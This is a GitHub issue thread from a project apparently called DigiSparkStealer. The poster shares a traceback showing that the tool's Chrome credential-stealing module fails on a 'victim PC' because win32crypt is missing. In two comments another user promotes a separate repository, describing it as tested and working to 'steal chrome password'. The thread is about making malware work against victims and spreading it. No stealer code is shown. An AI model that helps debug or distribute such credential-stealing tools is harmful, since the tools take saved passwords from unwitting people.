### ISSUE TITLE
Win32crypt lib is not installed on victim PC

### ISSUE THREAD

**Issue by kovinevmv** [kovinevmv/DigiSparkStealer#3]
Error: 
```
Traceback (most recent call last):
  File "main.py", line 5, in <module>
  File "c:\users\venom\appdata\local\programs\python\python38\lib\site-packages\PyInstaller\loader\pyimod03_importers.py", line 623, in exec_module
    exec(bytecode, module.__dict__)
  File "chromium.py", line 6, in <module>
ImportError: DLL load failed while importing win32crypt: Не найден указанный модуль.
[9672] Failed to execute script main
```

**Comment by houssam24** [comment]
I have tested this project and works very well

[]( https://github.com/hakanonymos/steal-chrome-password-all-version )

**Comment by houssam24** [comment]
I have tested this Project and works vey well ,steal chrome password

https://github.com/hakanonymos/steal-chrome-password-all-version
